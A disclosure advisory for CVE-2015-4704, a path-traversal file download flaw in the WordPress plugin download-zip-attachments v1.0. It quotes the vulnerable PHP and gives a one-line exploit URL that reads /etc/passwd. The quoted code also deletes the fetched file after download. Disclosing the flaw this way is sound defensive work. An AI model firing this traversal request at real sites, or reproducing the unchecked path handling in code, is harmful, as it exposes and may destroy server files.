Advisory #: 129
Title: Arbitrary file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
[CVE-2015-4704]
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: Download all attachments from the post into a zip file.
Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory. <?php if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){ define('WP_USE_THEMES', false); require('../../../wp-load.php'); require "create_zip_file.php"; $uploads = wp_upload_dir(); $tmp_location = $uploads['path']."/".$_REQUEST['File']; //echo $tmp_location; $zip = new CreateZipFile; $zip->forceDownload($tmp_location,false); unlink($tmp_location); exit; }
Export: JSON TEXT XML
Exploit Code:
  1. http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
Screen Shots:
Notes: